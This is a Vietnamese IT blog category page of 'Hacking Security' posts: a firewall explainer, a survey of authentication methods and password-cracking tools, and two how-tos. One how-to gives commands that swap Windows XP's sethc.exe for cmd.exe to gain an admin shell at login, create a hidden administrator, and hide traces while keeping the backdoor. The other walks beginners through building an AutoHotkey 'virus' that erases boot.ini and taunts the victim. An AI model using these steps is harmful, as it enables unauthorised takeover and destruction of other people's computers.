test import

Categories

Ad Home

Responsive Ads Here

Labels

642-813 SWITCH (2) 642-902 ROUTE (2) 643-832 TSHOOT (1) Access Based Enumeration (1) access list (2) AIX (1) Anti Malware (16) AutoIT (1) backtrack (4) Basic Networking (3) Blogspot (2) bootable USB (1) can not download attach file from gmail (1) ccna (9) CCNA Lab (19) centos (3) Check (1) Check_MK (3) cisco (51) Dell (1) DHCP (1) Download (2) Dynamic Host Configuration Protocol (1) ebook (2) Ebooks (18) eigrp (1) encapsulation (3) esxi5 (2) exam (13) exchange server 2010 (3) facebook (2) firewall-cmd (1) firewall-config (1) firewalld (1) Frame Relay (4) Free Router Simulator Softwares (1) FreeNAS (1) GhostSurf (1) gns3 (1) Hacking Security (5) hardware (1) hotspot (1) How to Change Windows 2008 R2 SID (1) How to create VPN network on Linux (1) How to install openSSH on AIX 5.3 (1) How to Install the Microsoft Core Fonts on Fedora 19 (1) HP (1) IBM (1) Infrastructure Monitoring (3) InterVLAN (1) ip routing (3) IPSec (2) ipv6 (1) IT (122) joomla (1) Kiến thức (278) LAN Technology (3) life skills for (1) lifeskills (2) linux (13) Linux-Unix (24) mac address (1) Magazine (9) Mail (2) mail server (1) MCSA (7) Microsoft (28) mikrotik (3) Multipoint (1) Nagios (3) NAT (1) nested (1) Network (1) Network Load Balancing (1) News (1) Nghệ thuật sống (1) O365 (4) Office 365 (4) OSPF (1) Packet tracer (19) Pass4sure (1) Point to Point (1) Point-to-Point Protocol (PPP) – CHAP (1) Point-to-Point Protocol (PPP) – PAP (1) Policy (3) Port Security (1) Practice Labs (19) Prerequisites (1) proxy (1) relax (7) rhel7 (1) RIP (1) routerOS (3) Routing (1) SAN (1) SAN Storage (1) Scripts (6) Server (1) server room (1) Sharepoint Server 2007 (1) Sharepoint Server 2010 (1) Spanning Tree Protocol (1) SSH login without password (1) Static Default Route (1) Storage (1) subnet (1) switch (1) System Requirements for Windows Server 2012 (1) Tản mạn (2) tcp-ip (1) telnet (1) TestInside (1) Thư giãn (4) Thủ thuật (2) tip (3) Tips + Tricks (29) trick (1) Tutorial (29) Tutorialvirtual server HighAvailability (1) ubuntu (4) unix (3) Unix-Linux (8) usb (1) Virtual Private Network (VPN) - IPsec (Site-to-Site) (1) Virtual Trunking Protocol (1) Virtualization (2) Virtualization HighAvailability (1) virus (5) vmware (6) vpn (4) vpn client (1) vpn client to site (2) vpn site to site (2) vSphere 5 (6) vSphere 5.1 (1) WAN Technology (13) Warranty (1) wildcard mask (1) windows 7 (1) windows 8 (1) windows server 2008 (3) Windows Server 8 (1)

Facebook

Ethereum

Subscribe for New Post Notifications

Ripple

Ethereum Price

Monday Tuesday Wednesday
$402.89 $384.06 $396.34

Contact Form

Name

Email *

Message *

Bitcoin

Litecoin

Browsing Category " Hacking Security "

Hack Password Administrators

Trong Windows XP có 1 chương trình gọi là StickyKey, khi chúng ta nhấn phím Shift  5 lần thì chương trình này sẽ hiện ra:

Highslide JS

File thực thi của chương trình này là c:\windows\system32\sethc.exe
Chúng ta sẽ Hack pass Admin từ lỗ hổng của chương trình này.

Khi sử dụng 1 máy tính nào đó mà chỉ có quyền của Guest hoặc Limited User,chúng ta cần cài đặt một ứng dụng nhưng ứng dụng này đòi hỏi quyền Admin mới có thể cài đặt.
Chà...chà...hack pass Quản Trị thôi! ^^
Thực hiện theo các bước sau:
Bước 1:
Run: cmd
gõ vào các dòng lệnh sau:  (khuyến khích nên gõ cho quen lệnh)

cd %systemroot%/system32 //vào thư mục system32
rename sethc.exe sethc.exe.bak //đổi tên sethc.exe thành sethc.bak
copy cmd.exe sethc.exe /y //thay thế file sethc.exe bằng file cmd.exe

(hoặc mở Notepad, paste đoạn mã trên vào và lưu lại với tên là crack.cmd Sau đó nhấp kép chuột lên file crack.cmd để thực thi.)

Bước 2:

Log off user đang dùng (Guest hoặc Limited user),từ cửa sổ chờ Login vào Windows, nhấp phím Shift 5 lần, nếu chương trình Command Prompt được gọi thay vì StickyKey thì bạn đã thành công!

Highslide JS

Chương trình StickyKey đã được thay bằng hộp thoại Command Line


Ở cửa số Command Prompt này chúng ta sẽ có toàn quyền biến đổi tùy ý các Users có trên máy!

Bước 3:Một số lệnh Command:

Xem những user nào hiện có trên máy (kể cả các user ần)

net user

Xóa trắng password của Administrator(hay tương tự với bất kì user nào):

net user Administrator cái này thì ko nên tí nào! dễ lộ lắm!hehe..

Thêm tài khoản MrCuong với pw là happend vào hệ thống

net user MrCuong happend /add

Gán tài khoản MrCuong vào nhóm Quản Trị :

net localgroup Administrators MrCuong /add

Sau khi thực hiện các lệnh trên thì MrCuong đã là một thành viên của Administrators,có thể đăng nhập vào hệ thống mà không cần khởi động lại máy!
Sau khi dùng xong tài khoản mới tạo thì xóa đi để giấu dấu vết.

net user MrCuong /delete

Ẩn profile ứng với tài khoản MrCuong(xóa thì lâu lắm)

attrib +s +h +r C:\Documents and Settings\MrCuong

Với những Quản Trị Viên chuyên nghiệp thì sẽ biết có sự tồn tại của Profile mới tạo nhưng cmd.exe đã đổi tên thành sethc.exe vẫn còn trong System32, thì chúng ta vẫn còn nắm quyền kiểm soát!Hehehe...


Bài viết chỉ mang tính chất trao đổi, học hỏi. Không khuyến khích anh em áp dụng phá hoại máy tính người khác.

Firewall - Tường lửa là gì?

Một cách vắn tắt, tường lửa (firewall) là hệ thống ngăn chặn việc truy nhập trái phép từ bên ngoài vào mạng. Tường lửa thực hiện việc lọc bỏ những địa chỉ không hợp lệ dựa theo các quy tắc hay chỉ tiêu định trước.

Tường lửa có thể là hệ thống phần cứng, phần mềm hoặc kết hợp cả hai. Nếu là phần cứng, nó chỉ bao gồm duy nhất bộ định tuyến (router). Bộ định tuyến có các tính năng bảo mật cao cấp, trong đó có khả năng kiểm soát địa chỉ IP (IP Address ố là sơ đồ địa chỉ hoá để định nghĩa các trạm (host) trong liên mạng). Quy trình kiểm soát cho phép bạn định ra những địa chỉ IP có thể kết nối với mạng của bạn và ngược lại. Tính chất chung của các tường lửa là phân biệt địa chỉ IP hay từ chối việc truy nhập không hợp pháp căn cứ trên địa chỉ nguồn.

Các dạng tường lửa

Mỗi dạng tường lửa khác nhau có những thuận lợi và hạn chế riêng. Dạng phổ biến nhất là tường lửa mức mạng (Network-level firewall).

Loại tường lửa này thường dựa trên bộ định tuyến, vì vậy các quy tắc quy định tính hợp pháp cho việc truy nhập được thiết lập ngay trên bộ định tuyến. Mô hình tường lửa này sử dụng kỹ thuật lọc gói tin (packet-filtering technique) ố đó là tiến trình kiểm soát các gói tin qua bộ định tuyến.

Khi hoạt động, tường lửa sẽ dựa trên bộ định tuyến mà kiểm tra địa chỉ nguồn (source address) hay địa chỉ xuất phát của gói tin. Sau khi nhận diện xong, mỗi địa chỉ nguồn IP sẽ được kiểm tra theo các quy tắc do người quản trị mạng định trước.

Tường lửa dựa trên bộ định tuyến làm việc rất nhanh do nó chỉ kiểm tra lướt trên các địa chỉ nguồn mà không hề có yêu cầu thực sự nào đối với bộ định tuyến, không tốn thời gian xử lý những địa chỉ sai hay không hợp lệ. Tuy nhiên, bạn phải trả giá: ngoại trừ những điều khiển chống truy nhập, các gói tin mang địa chỉ giả mạo vẫn có thể thâm nhập ở một mức nào đó trên máy chủ của bạn.

Một số kỹ thuật lọc gói tin có thể được sử dụng kết hợp với tường lửa để khắc phục nhược điểm nói trên. Địa chỉ IP không phải là thành phần duy nhất của gói tin có thể mắc bẫy bộ định tuyến. Người quản trị nên áp dụng đồng thời các quy tắc, sử dụng thông tin định danh kèm theo gói tin như thời gian, giao thức, cổng... để tăng cường điều kiện lọc. Tuy nhiên, sự yếu kém trong kỹ thuật lọc gói tin của tường lửa dựa trên bộ định tuyến không chỉ có vậy.

Một số dịch vụ gọi thủ tục từ xa (Remote Procedure Call - RPC) rất khó lọc một cách hiệu quả do các server liên kết phụ thuộc vào các cổng được gán ngẫu nhiên khi khởi động hệ thống. Dịch vụ gọi là ánh xạ cổng (portmapper) sẽ ánh xạ các lời gọi tới dịch vụ RPC thành số dịch vụ gán sẵn, tuy nhiên, do không có sự tương ứng giữa số dịch vụ với bộ định tuyến lọc gói tin, nên bộ định tuyến không nhận biết được dịch vụ nào dùng cổng nào, vì thế nó không thể ngăn chặn hoàn toàn các dịch vụ này, trừ khi bộ định tuyến ngăn toàn bộ các gói tin UDP (các dịch vụ RPC chủ yếu sử dụng giao thức UDP ố User Datagram Protocol). Việc ngăn chặn tất cả các gói tin UDP cũng sẽ ngăn luôn cả các dịch vụ cần thiết, ví dụ như DNS (Domain Name Service ố dịch vụ đặt tên vùng). Vì thế, dẫn đến tình trạng tiến thoái lưỡng nan.

Tường lửa dựa trên ứng dụng/cửa khẩu ứng dụng

Một dạng phổ biến khác là tường lửa dựa trên ứng dụng (application-proxy). Loại này hoạt động hơi khác với tường lửa dựa trên bộ định tuyến lọc gói tin. Cửa khẩu ứng dụng (application gateway) dựa trên cơ sở phần mềm. Khi một người dùng không xác định kết nối từ xa vào mạng chạy cửa khẩu ứng dụng, cửa khẩu sẽ ngăn chặn kết nối từ xa này. Thay vì nối thông, cửa khẩu sẽ kiểm tra các thành phần của kết nối theo những quy tắc định trước. Nếu thoả mãn các quy tắc, cửa khẩu sẽ tạo cầu nối (bridge) giữa trạm nguồn và trạm đích.

Cầu nối đóng vai trò trung gian giữa hai giao thức. Ví dụ, trong một mô hình cửa khẩu đặc trưng, gói tin theo giao thức IP không được chuyển tiếp tới mạng cục bộ, lúc đó sẽ hình thành quá trình dịch mà cửa khẩu đóng vai trò bộ phiên dịch.

Ưu điểm của tường lửa cửa khẩu ứng dụng là không phải chuyển tiếp IP. Quan trọng hơn, các điều khiển thực hiện ngay trên kết nối. Sau cùng, mỗi công cụ đều cung cấp những tính năng thuận tiện cho việc truy nhập mạng. Do sự lưu chuyển của các gói tin đều được chấp nhận, xem xét, dịch và chuyển lại nên tường lửa loại này bị hạn chế về tốc độ. Quá trình chuyển tiếp IP diễn ra khi một server nhận được tín hiệu từ bên ngoài yêu cầu chuyển tiếp thông tin theo định dạng IP vào mạng nội bộ. Việc cho phép chuyển tiếp IP là lỗi không tránh khỏi, khi đó, cracker (kẻ bẻ khoá) có thể thâm nhập vào trạm làm việc trên mạng của bạn.

Hạn chế khác của mô hình tường lửa này là mỗi ứng dụng bảo mật (proxy application) phải được tạo ra cho từng dịch vụ mạng. Như vậy một ứng dụng dùng cho Telnet, ứng dụng khác dùng cho HTTP, v.v..

Do không thông qua quá trình chuyển dịch IP nên gói tin IP từ địa chỉ không xác định sẽ không thể tới máy tính trong mạng của bạn, do đó hệ thống cửa khẩu ứng dụng có độ bảo mật cao hơn.

Các ý niệm chung về tường lửa

Một trong những ý tưởng chính của tường lửa là che chắn cho mạng của bạn khỏi tầm nhìn của những người dùng bên ngoài không được phép kết nối, hay chí ít cũng không cho phép họ rớ tới mạng. Quá trình này thực thi các chỉ tiêu lọc bỏ do người quản trị ấn định.

Trên lý thuyết, tường lửa là phương pháp bảo mật an toàn nhất khi mạng của bạn có kết nối Internet. Tuy nhiên, vẫn tồn tại các vấn đề xung quanh môi trường bảo mật này. Nếu tường lửa được cấu hình quá chặt chẽ, tiến trình làm việc của mạng sẽ bị ảnh hưởng, đặc biệt trong môi trường người dùng phụ thuộc hoàn toàn vào ứng dụng phân tán. Do tường lửa thực thi từng chính sách bảo mật chặt chẽ nên nó có thể bị sa lầy. Tóm lại, cơ chế bảo mật càng chặt chẽ bao nhiêu, thì tính năng càng bị hạn chế bấy nhiêu.

Một vấn đề khác của tường lửa tương tự như việc xếp trứng vào rổ. Do là rào chắn chống kết nối bất hợp pháp nên một khe hở cũng có thể dễ dàng phá huỷ mạng của bạn. Tường lửa duy trì môi trường bảo mật, trong đó nó đóng vai trò điều khiển truy nhập và thực thi sơ đồ bảo mật. Tường lửa thường được mô tả như cửa ngõ của mạng, nơi xác nhận quyền truy nhập. Tuy nhiên điều gì sẽ xảy ra khi nó bị vô hiệu hoá? Nếu một kỹ thuật phá tường lửa được phát hiện, cũng có nghĩa người vệ sĩ bị tiêu diệt và cơ hội sống sót của mạng là rất mỏng manh.

Vì vậy trước khi xây dựng tường lửa, bạn nên xem xét kỹ và tất nhiên phải hiểu tường tận về mạng của mình.

Phải chăng tường lửa rất dễ bị phá?

Câu trả lời là không. Lý thuyết không chứng minh được có khe hở trên tường lửa, tuy nhiên thực tiễn thì lại có. Các cracker đã nghiên cứu nhiều cách phá tường lửa. Quá trình phá tường lửa gồm hai giai đoạn: đầu tiên phải tìm ra dạng tường lửa mà mạng sử dụng cùng các loại dịch vụ hoạt động phía sau nó; tiếp theo là phát hiện khe hở trên tường lửa ố giai đoạn này thường khó khăn hơn. Theo nghiên cứu của các cracker, khe hở trên tường lửa tồn tại là do lỗi định cấu hình của người quản trị hệ thống, sai sót này cũng không hiếm khi xảy ra. Người quản trị phải chắc chắn sẽ không có bất trắc cho dù sử dụng hệ điều hành (HĐH) mạng nào, đây là cả một vấn đề nan giải. Trong các mạng UNIX, điều này một phần là do HĐH UNIX quá phức tạp, có tới hàng trăm ứng dụng, giao thức và lệnh riêng. Sai sót trong xây dựng tường lửa có thể do người quản trị mạng không nắm vững về TCP/IP (Transmission Control Protocol/ Internet Protocol).

Một trong những việc phải làm của các cracker là tách các thành phần thực ra khỏi các thành phần giả mạo. Nhiều tường lửa sử dụng trạm hy sinh (sacrificial hosts) - là hệ thống được thiết kế như các server Web (có thể sẵn sàng bỏ đi) hay bẫy (decoys), dùng để bắt các hành vi thâm nhập của cracker. Bẫy có thể cần dùng tới những thiết bị ngụy trang phức tạp nhằm che dấu tính chất thật của nó, ví dụ: đưa ra câu trả lời tương tự hệ thống tập tin hay các ứng dụng thực. Vì vậy, công việc đầu tiên của cracker là phải xác định đây là các đối tượng tồn tại thật.

Để có được thông tin về hệ thống, cracker cần dùng tới thiết bị có khả năng phục vụ mail và các dịch vụ khác. Cracker sẽ tìm cách để nhận được một thông điệp đến từ bên trong hệ thống, khi đó, đường đi được kiểm tra và có thể tìm ra những manh mối về cấu trúc hệ thống.

Ngoài ra, không tường lửa nào có thể ngăn cản việc phá hoại từ bên trong. Nếu cracker tồn tại ngay trong nội bộ tổ chức, chẳng bao lâu mạng của bạn sẽ bị bẻ khoá. Thực tế đã xảy ra với một công ty dầu lửa lớn: một tay bẻ khoá trà trộn vào đội ngũ nhân viên và thu thập những thông tin quan trọng không chỉ về mạng mà còn về các trạm tường lửa.

Lời kết

Hiện tại, tường lửa là phương pháp bảo vệ mạng phổ biến nhất, 95% cộng đồng phá khoá phải thừa nhận là dường như không thể vượt qua tường lửa. Song trên thực tế, tường lửa đã từng bị phá. Nếu mạng của bạn có kết nối Internet và chứa dữ liệu quan trọng cần được bảo vệ, bên cạnh tường lửa, bạn nên tăng cường các biện pháp bảo vệ khác
 
                                                                                                                                    Theo VNsecurity

Giới thiệu các phương thức Crack Passwords - Cách đề phòng

Username Password là hai vấn đề nhạy cảm nhất trong một máy tính, một mạng nhỏ cho tới mạng Internet. Trong bài viết này tôi trình bày với các bạn tổng quát về các phương thức xác thực, các cách phá mật khẩu và các Tools sử dụng để phá mật khẩu. Từ đó các bạn sẽ biết cách tự bảo vệ mình trước các cuộc tấn công.

Trong bài viết này tôi sẽ trình bày chi tiết với các bạn những phần sau:

- Authentication – xác thực

- Authentication Mechanisms – Các phương thức xác thực

- Phá Password

- Những tấn công dựa vào phá Password

- Thực hiện một quá trình phá Password

- Phân chia các loại tấn công

- Các công cụ sử dụng để phá Password.

- Các phương thức cụ thể.

Các bước tiến hành trong quá trình tấn công phá mật khẩu

Highslide JS

1. Xác thực – Authentication

- Xác thực là một quá trình nhận dạng người dùng

- Trong hệ thống mạng máy tính, xác thực chủ yếu sử dụng LoginID (Username) và Password.

- Biết mật khẩu của một tài khoản là điều cần thiết để xác thực

- Nhưng Password có thể bị mất, bị đánh cắp, bị thay đổi và bị phá, điều này dẫn tới nguy cơ bảo mật cho hệ thống.

2. Các phương thức xác thực

Hầu hết các phương thức xác thực đều dựa trên:

+ Những gì bạn biết (Username Password)

+ Những gì bạn có (Smart Card, Certificate)

+ Những gì là bạn (Sinh trắc học)

- HTTP Authentication – Xác thực trên WEB.

+ Basic Authentication

+ Digest Authentication

- Kết hợp với phương thức xác thực NTLM của Windows

- Negotiate Authentication – Thỏa thuận xác thực

- Xác thực dựa vào Certificate.

- Xác thực dựa vào Forms

- Xác thực dựa vào RSA Secure Token

- Xác thực dựa vào Sinh trắc học (xác thực vân tay, mặt, mắt….)

2.1. HTTP Authentications

a. Basic Authentication


Highslide JS

- Là một phương thức xác thực phổ thông có trên nền tảng ứng dụng Web.

- Nó sẽ xuất hiện ra khi Client yêu cầu những thông tin phải được xác thực.

- Giới hạn những giao thức, cho phép những kẻ tấn công khai thác.

- Sử dụng SSL để mã hóa dữ liệu Username Password để truyền giữa Client và Server.

b. Degest Authentication

Highslide JS

- Được thiết kế để nâng cao bảo mật hơn phương thức Basic Authentication

- Được dựa trên nền tảng xác thực Challenge-Response

- Nâng cao bảo bảo mật hơn phương thức Basic Authentication, hệ thống sẽ mã hóa Usernaem Password trước khi truyền đi trên mạng.

2.2. Kết hợp với phương thức xác thực NTLM của Windows

Highslide JS

- Sử dụng công nghệ xác thực NT LAN Manager (NTLM) cho HTTP

- Chỉ làm việc với IE và trên nền tảng Web server là IIS.

- Kết hợp với xác thực trên Windows sẽ thích hợp cho môi trường mạng cục bộ của doanh nghiệp

- Nó là một phương thức xác thực mà không phải truyền bất kỳ thông tin nào về Username password trên mạng.

2.3. Xác thực Negotiate.

- Đây là một phương thức xác thực mở rộng cho NTLM Authentication

- Cung cấp xác thực dựa trên nền tảng Kerberos

- Sử dụng quá trình thương lượng để quyết định mức độ bảo mật được sử dụng.

- Nó được cấu hình và sử dụng không chỉ cho mạng cục bộ.

2.4. Xác thực dựa vào Certificate.

Highslide JS

- Sử dụng Public Key để mã hóa và chứng chỉ số (Digital Certificate) để xác thực người dùng.

- Nó được quan tâm và kết hợp với phương thức xác thực two-factor. Khi một người dùng biết được Username Password người đó còn phải cung cấp Certificate nữa thì mới được xác thực.

- Người dùng có thể bị đánh cắp Certtificate.

- Rất nhiều phần mềm hiện nay hỗ trợ xác thực qua chứng chỉ số.

2.5. Xác thực dựa vào Forms-Based.

Highslide JS

- Nó không được hỗ trợ trên nền tảng HTTP và SSL

- Nó là một lựa chọn cao cấp cho phương thức xác thực sử dụng một Form, và thường tích hợp dạng HTML.

- Là một phương thức xác thực rất phổ biết trên Internet.

2.6. Phương thức xác thực RSA SecurID Token

Highslide JS

- PHương thức xác thực SecureID sử dụng một "token – Vé, card). Có một thiết bị phần cứng sẽ sinh ra các mã xác thực sau mỗi 60 giây và sử dụng một tấm Card để giải mã key.

- Một người dùng thực hiện quá trình xác thực và tài nguyên mạng sẽ phải điền mã PIN và số hiển thị cho SecureID cho mỗi thời gian đó.

2.7. Biometrics Authentications

Highslide JS

- Một hệ thống xác thực dựa vào Sinh trắc học sẽ phải có những thiết bị nhận diện được người dùng dựa vào các yếu tố sinh học như: Vân tay, mắt, mặt, bàn tay….

- Đây là một phương thức xác thực có tính bảo mật rất cao và thuận tiện cho người sử dụng không phải nhớ mật khẩu hay mang theo một tấm Card.

3. Làm thế nào để có một mật khẩu bảo mật.

- Áp đặt chính sách độ dài tối thiểu của mật khẩu là 8 và tốt nhất là 15

- Yêu cầu phải có những ký tự đặc biệt, số, chữ hoa, chữ thường trong một mật khẩu

- Không sử dụng bất kỳ từ khóa nào trong từ điển English hay những nước khác

- Không sử dụng Password giông tên Username, và phải thay đổi thường xuyên

- Chọn Password bạn dễ dàng sử dụng mà người khác khó đoán biết được.

4. Những khuyến cáo đặt password khác

- Đừng bao giờ chỉ đặt một ký tự đặc biệt sau một từ khóa ví dụ: Không đặt password là: vnexperts1

- Đừng bao giờ sử dụng ghép hai từ với nhau để được một Password ví như: vnevne

- Không đặt Password dễ đoán

- Không đặt password quá ngắn

- Không đặt Password mà từ thường xuyên gõ đúng như: asdf;lkj

- Hãy thay đổi mật khẩu thường xuyên ít nhất một tháng một lần – Hãy thay đổi ngay lập tức khi phát hiện ra mật khẩu của mình bị người khác sử dụng.

- Đừng bao giờ chứa Password trên máy tính của bạn – nhiều người có thói quen vào các trang web và lưu lại mật khẩu của mình điều này không bảo mật bởi mã hóa trong máy tính dễ dàng bị giải mã.

- Các mật khẩu trong Windows lưu vào các file .pwl không được bảo mật.

- Không nói cho người khác biết mật khẩu của mình.

- Không gửi mail và tránh đặt trùng Password trên nhiều ứng dụng

- Không ghi Password của mình ra cho dễ nhớ.

- Khi gõ Password hãy cẩn thận với các loại Keyloger và người xem chộm

5. Hacker lấy mật khẩu của bạn qua những phương pháp.

- Xem bạn gõ mật khẩu

- Tìm xem bạn có ghi mật khẩu của mình ra giấy hay không

- Đoán mật khẩu dựa vào các số quen thuộc như: 123456, 654321…

- Sử dụng phương thức tấn công Brute Force

+ Đây là phương thức tổng hợp các ký tự lần lượt để tấn tìm ra mật khẩu.

- Sử dụng phương thức tấn công Dictionary Attack

+ Phương thức tấn công này tìm mật khẩu trong một bộ từ điển được sinh ra trước đó.

- Cách tạo ra một mật khẩu khó:

+ Chẳng hạn mật khẩu của tôi ban đầu định đặt là: yeuemnhieu

+ Giờ tôi viết hoa chữ Y và chữ U thành: YeUemnhieU

+ Chữ E trong bảng chữ cái đứng vị chí 5 mật khẩu tôi thành: Y5U5mnhi5U

+ Chữ i tôi đổi thành ! mật khẩu thành Y5U5mnh!5U

+ Password của tôi đủ 10 ký tự có số, có hoa, có thường, có ký tự đặc biệt.

6. Xóa Password đã được lưu trong vWindows XP


- Vào run gõ: Rundll32.exe Keymgr.dll, KRShowKeyMgr

- Sẽ hiện ra bảng tương tự dưới đây và bạn hãy xóa hết những mật khẩu đã được lưu trong hệ thống.

Highslide JS

7. Phá mật khẩu tổng quát

- Về định nghĩa một Password Cracker là chương trình có thể giải mã được mật khẩu hay có thể vô hiệu hóa được mật khẩu.

- Password Cracker có hai phương pháp chính đó là: Brute Force và Dictionary Attack, ngoài ra hiện nay mới có chương trình phá mật khẩu thông minh hơn hai kiểu cổ điển trên đó là phương thức tìm Password: Smart Table Recovery – đáp ứng tốc độ tìm mật khẩurất nhanh.

- Password Cracker cũng có thể là một chương trình dùng để giải mã những mật khẩu đã được mã hóa, ví như các mật khẩu được lưu trong IE, Firefox,…

8. Mục tiêu của các chương trình tìm mật khẩu.

- Trên hệ thống Windows và Linux có hai tài khoản toàn quyền trong hệ thống đó là: root và Administrator, và mục tiêu tấn công là tìm được password của hai tài khoản đó

- Khi tìm được Password của tài khoản có quyền quản trị kẻ tấn công sẽ toàn quyền với máy đích.

- Kẻ tấn công cũng có thể dùng các phần mềm Sniffer để tóm các gói tin Username Password được truyền đi trong hệ thống mạng.

- Và ảnh hưởng của việc bị chiếm mất quyền quản trị tùy thuộc hoàn toàn vào dữ liệu và các ứng dụng trong hệt hống.

9. Chương trình Password Cracker hoạt động như thế nào ?

- Để hiểu được một Password Cracker làm việc như thế nào chúng ta cần phải hiểu được các chương trình quản lý Password thực hiện ra sao. Hầu hết các chương trình quản lý Password đều mã hóa Password theo một phương thức nào đó.

- Mật khẩu sau khi được tạo ra và lưu vào trong hệ thống sẽ được mã hóa, hệ thống sẽ chứa Key để giải mã mật khẩu.

- Những phần mềm Password Cracker sẽ tìm cách lấy được các đoạn mật mã đó.

-Sau khi đã lấy được các đoạn mật mã trên máy của nạn nhân chúng sẽ tiến hành giải mã mật khẩu bằng những phương thức cụ thể cho từng tình huống.

10. Các dạng Password Cracker

- Dictionary Attack: Tìm mật khẩu trong một file từ điển tạo sẵn

- Brute Force Attack: Tìm mật khẩu bằng cách tổ hợp các ký tự

- Hybird Attack: Lai giữa hai phương thức trên

- Smart Table Recovery Attack: Phương thức tấn công tìm mật khẩu thông minh nhất dựa trên các bảng dữ liệu – Khoảng 700MB dữ liệu text.

11. Tìm Password bằng phương thức đơn giản

- Đoán mật khẩu

- Thay thế đoạn URL

12. Tìm Password bằng giải mã Cookies

- Với chương trình CT cookie Spy 2.0

- Cookies thương lưu lại rất nhiều thông tin quan trọng của người dùng khi truy cập vào Internet như Username và Password truy cập vào một Website.

- Với phần mềm này bạn có thể tìm kiếm các Cookies được lưu dữ trong hệ thống và giải mã chúng để tìm Username Password.

Highslide JS

13. Tấn công Dictionary Attack.

- Tạo từ điển dùng phần mềm: Dictionary Maker

Highslide JS

14. Danh sách các Tools Password Crackers

-Lophtcrack - WebCracker

- John The Ripper - Munga Bunga

- Brutus - ReadCookies

- Obiwan - SnadBoy

- Authforce - WinSSLMiM

- Hydra - RAR

- Cain & Abel Gammaprog

Hầu hết các tools này đều miễn phí và nếu có phí thì hoàn toàn crack được một cách dễ dàng

Hầu hết chúng đều có khả năng sử dụng tất cả các loại tấn công trên, đều có thể Export Username Password từ một hệ thống Local hay Remote.

- Theo kinh nghiệm của tôi hay dùng đó là: Cain & Abel tuy nhiên phần mềm này mạnh về giải mã và Sniffer hơn. Lophcrack có lẽ crack khá nhanh bất kỳ password nào dài dưới 10 ký tự máy tính của tôi chỉ cần khoảng hơn 1 giờ là có thể giải mã được.

- John the Ripper đây là phần mềm chuyên phá mật khẩu trong môi trường Unix và sử dụng mã hóa DES, Extend DES, MD5 cũng tích hợp nhiều phương pháp giải mã.

- Brutus là một chương trình Online hay Remote Password Cracker. Tấn công tới một hệ thống như máy chủ IIS, Windows, Modem ADSL…. Chúng thử lần lượt Username và Password nhất định để tấn công vào máy chủ

- Obiwan khắc phục nhược điểm của Brutus là có độ trễ khi sử dụng Username Password sai.

- Authforce dựa vào HTTP Basic Authentication hỗ trợ việc thử Username Password tới một site nhất định

- MessenPass có thể giải nén được hầu hết các tài khoản chát như Yahoo, MSN…

Highslide JS

Lưu ý từ phiên bản YM 7 password không bao giờ được lưu ở máy Local lên phần mềm này không crack được.

- Wireless WEP Key Password Spy đây là một tools hỗ trợ giải mã để truy cập vào một hệ thống mạng vWireless đặt mật khẩu.

                                                                                        Theo Zensoft - Vnexperts Research Departmen

TỰ TẠO 1 CON VIRUS = AUTOHOTKEY

BÀI HƯỚNG DẪN NÀY CHỈ ĐỂ CHO CÁC BÁC CHOAI CHOAI THÔI NHA KHÔNG DÙNG ĐƯỢC CHO CÁC ANH Pro

Hướng dẫn

Bước đầu bạn cài đặt chương trình và chú ý đến 3 đường link sau "tôi chọn đường link theo mặc định của chương trình có thể link của bạn khác nếu bạn cài đặt không theo mặc định của chương trình hoặc cài Windows không vào ổ C "

Bước 1

Bạn vào theo đường link mặc định của chương trình
C:\Program Files\AutoHotkey\AutoScriptWriter\AutoScriptWriter.exe
rồi kick vào Browse tìm đến chương trình mà bạn muốn AUTO "ở đây tôi hướng dẫn cho bạn tạo 1 con virut nghịch chút nha"



Bạn Browse đến đường dẫn C:\WINDOWS\NOTEPAD.EXE

Sau khi bạn Browse đường dẫn xong rồi Kick vào nút ARecord như hình trên

Có 1 màn hình NOTEPAD hiện ra như vậy nè

Highslide JS

Bạn chỉ chú ý đến màn hình NOTEPAD thôi còn cái Stop kia thì kệ nó ^^ bạn để cho nó yên . Từ màn hình NOTEPAD bạn ấn "Ctrl + O" O ở đây là chữ O nha không phải số 0 đâu nha ^^ . Rồi bạn gõ đường link như sau "C:\boot.ini" --> Enter

Chú ý nếu bạn đang làm theo tôi thì bạn phải coppy cái "boot.ini" ra nơi khác nha
không thì ^^ "nếu bạn không biết cách coppy thì bạn vào "My Computer" rồi kick vào Tools / Folder Options.... / View /

Highslide JS

tích vào

+Show hidden files and folders

bỏ tích

-Hide extensions for known file types

--Hide protected operating system files (Recommended)

Còn nếu bạn không có Folder Options.... thì bạn đã bị nhiễm virut "cấm nhìn fai ẩn" tốt nhất là bạn download BKAV về đi ^^

Tiếp tục quay lại việc chế tạo của chúng ta nha
Sau khi Enter bạn có 1 NOTEPAD gần như vậy nè
Image

tiếp tục bạn ấn "Ctrl + A" rồi tiếp tục ấni " Delete" tiếp theo là "Ctrl + S " ^^ bây zờ bạn đã hoàn thành xong virut phá hoại rồi đó ^^

nhưng bạn cho con vi rút 1 chút hài hước nha "chủ yếu cho nạn nhân tức điên lên thôi "

Từ màn hình NOTEPAD trắng xóa bạn đánh thêm mấy dòng vào VÍ DỤ :

Ban Da Bi Nhiem Vi Rut "MADE IN TUI" do softnhac.kiss.vn Huong Dan Neu Ban Khoi Đong Lai May Thi Ban Teo Ngay Ban Hay Lien Lac Voi softnhac.kiss.vn đe nhan đưoc thuoc giai đoc ^^

Cuoi Cung Chuc Ban Co 1 Ngay Vui Ve

Nạn Nhân Sẽ Nhận Được Thông Điệp Như Thế Này
Image
Rôi bạn ấn Vào STOP chắc bạn cũng quên mất STOP nào rồi nhỉ cái nè nè ^^
Image
Rồi bạn thu được 1 đống hổ đốn ở AutoScript Writer II bạn chọn Save đến đây nè C:\Documents and Settings\Administrator\Desktop\VIRUT.ahk
Image

Thế là xong bước 1 "phù nghỉ đã ^^ "


BƯỚC 2

Bạn Chạy Link sau

C:\Program Files\AutoHotkey\Compiler\Ahk2Exe.exe

Highslide JS

Trong Source bạn Browse đến đường link sau C:\Documents and Settings\Administrator\Desktop\VIRUT.ahk

Trong Custom Icon bạn Browse đến Icon bạn thích nha còn nếu không thì thôi ^^ "có thì virut bạn đẹp hơn ^^ "

Rồi Ấn Convert thế là xong vi rút bạn tạo ra ở C:\Documents and Settings\Administrator\Desktop\VIRUT.exe

Chúc Bạn Không Bị Dính Anh Em Họ Hàng Con Virut Này Nha ^^ !

Nguồn : sưu tầm

Cracking WEP Using Backtrack 3

